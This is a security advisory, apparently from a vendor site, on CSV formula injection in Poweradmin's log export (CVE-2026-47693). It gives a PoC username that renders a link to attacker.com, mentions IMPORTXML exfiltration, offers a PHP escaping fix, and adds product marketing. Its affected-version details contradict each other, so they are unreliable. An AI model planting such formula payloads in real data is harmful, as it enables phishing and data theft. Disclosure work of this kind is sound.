Summary
Description:
Poweradmin v4.4.0 is vulnerable to CSV Injection (Formula Injection) in its log export functionality. User-controlled data, specifically the username field, is written to exported CSV files without sanitizing formula trigger characters (=, +, -, @). When an administrator exports activity logs and opens the resulting CSV in a spreadsheet application (Microsoft Excel, LibreOffice Calc, Google Sheets), any formula stored in a username is executed by the application. This can be used for phishing attacks against administrators or data exfiltration.
Details
The vulnerability exists in all four log export controllers:
- lib/Application/Controller/ListLogUsersController.php (lines 188, 194)
- lib/Application/Controller/ListLogZonesController.php
- lib/Application/Controller/ListLogGroupsController.php
- lib/Application/Controller/ListLogApiController.php
These controllers export database rows via fputcsv() without applying any formula injection countermeasures. The user column contains the username of the actor who performed the operation, and the username column (in user logs) contains the username of the affected account. Both fields are written verbatim to the CSV output.
A username such as =1+1 is written without CSV enclosure quotes (because it contains no commas or quotes), so spreadsheet applications treat it directly as a formula. A username containing commas or quotes (e.g. =HYPERLINK("http://attacker.com","Click here")) is enclosed in CSV quotes with internal quotes doubled, but spreadsheet applications still evaluate the cell value as a formula since it begins with =.
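A hardened write path for the log export, as an added example and not Poweradmin's own code: it neutralises formula triggers in every column before fputcsv() applies its quoting. The column names, the write_log_row helper and the sample rows are constructed for illustration.

```php
<?php
// Added example (not Poweradmin's code): a hardened replacement for the
// verbatim fputcsv() write described above. Column names are assumptions.

/**
 * Neutralise a cell that a spreadsheet would evaluate as a formula.
 * Cells beginning with =, +, -, @ (or a tab / carriage return, which some
 * applications also honour as triggers) get a leading single quote, which
 * spreadsheet applications display as literal text. Plain numbers such as
 * "-5" are left alone: they carry no formula and would otherwise be mangled.
 */
function csv_escape_formula(string $value): string
{
    if ($value === '' || is_numeric($value)) {
        return $value;
    }
    $triggers = ['=', '+', '-', '@', "\t", "\r"];
    return in_array($value[0], $triggers, true) ? "'" . $value : $value;
}

/**
 * Write one log row. Every column is escaped first; fputcsv() then adds
 * RFC 4180 quoting. The explicit '' escape argument disables PHP's
 * non-standard backslash handling so the output round-trips cleanly.
 */
function write_log_row($handle, array $row): void
{
    $escaped = array_map(fn($cell) => csv_escape_formula((string) $cell), $row);
    fputcsv($handle, $escaped, ',', '"', '');
}

// Constructed sample rows shaped like the user-log export; the second row
// carries the formula username from the PoC on this page.
$rows = [
    ['id' => 1, 'user' => 'admin', 'username' => 'alice', 'event' => 'user_add_new'],
    ['id' => 2, 'user' => '=HYPERLINK("http://attacker.com","Confirm Identity")',
                'username' => 'alice', 'event' => 'login'],
];

$out = fopen('php://output', 'w');
fputcsv($out, ['id', 'user', 'username', 'event'], ',', '"', '');
foreach ($rows as $row) {
    write_log_row($out, $row);
}
fclose($out);
```

The formula username is emitted quoted and prefixed, so the spreadsheet shows it as text rather than a link; the apostrophe stays visible in some applications, which is the accepted trade-off of this mitigation.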
Additionally, PHP deprecation warnings are emitted directly into the HTTP response body before CSV headers, exposing internal file paths (e.g. /app/lib/Application/Controller/ListLogUsersController.php), a secondary information disclosure issue (CWE-209). This also corrupts the CSV file when PHP error reporting is enabled.
PoC
Prerequisites: An account with user_add_new permission (administrator role).
Steps to reproduce:
- Log in as administrator.
- Navigate to Add User and create an account with:
  - Username: =HYPERLINK("http://attacker.com","Confirm Identity")
  - Any valid email and password
- Log out, then log in with the newly created account to generate a log entry.
- Log back in as administrator.
- Navigate to /users/logs and click Export CSV.
- Open the downloaded CSV file in Microsoft Excel or LibreOffice Calc.
Result: Excel renders a clickable hyperlink labeled "Confirm Identity" pointing to http://attacker.com in the user column of the log entry. With the simpler username =1+1, the cell displays 2 instead of the literal text, confirming formula execution.
Confirmed on Poweradmin v4.4.0 (Docker image poweradmin/poweradmin:latest).
Impact
This is a CSV Injection vulnerability (CWE-1236). It affects any administrator who exports activity logs to CSV and opens the file in a spreadsheet application.
Attack scenarios:
- Phishing: A malicious actor with the ability to create user accounts sets a formula username that renders as a convincing link in the exported report, tricking a higher-privileged administrator into clicking it.
- Data exfiltration: Using =IMPORTXML() in Google Sheets or similar, adjacent cell data (log contents) can be sent to an attacker-controlled server silently when the sheet is opened.
CVE-2026-47693 has a CVSS score of 6.9 (Medium). The vector is network-reachable, high privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.2.4, 4.3.3); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Upgrade poweradmin/poweradmin to 4.2.4 or later, or to 4.3.3 or later.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-47693? CVE-2026-47693 is a medium-severity security vulnerability in poweradmin/poweradmin (composer), affecting versions < 4.2.4. It is fixed in 4.2.4, 4.3.3.
- How severe is CVE-2026-47693? CVE-2026-47693 has a CVSS score of 6.9 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of poweradmin/poweradmin are affected by CVE-2026-47693? poweradmin/poweradmin (composer) versions < 4.2.4 are affected.
- Is there a fix for CVE-2026-47693? Yes. CVE-2026-47693 is fixed in 4.2.4, 4.3.3. Upgrade to this version or later.
- Is CVE-2026-47693 exploitable, and should I be worried? Whether CVE-2026-47693 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2026-47693 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-47693?
  - Upgrade poweradmin/poweradmin to 4.2.4 or later
  - Upgrade poweradmin/poweradmin to 4.3.3 or later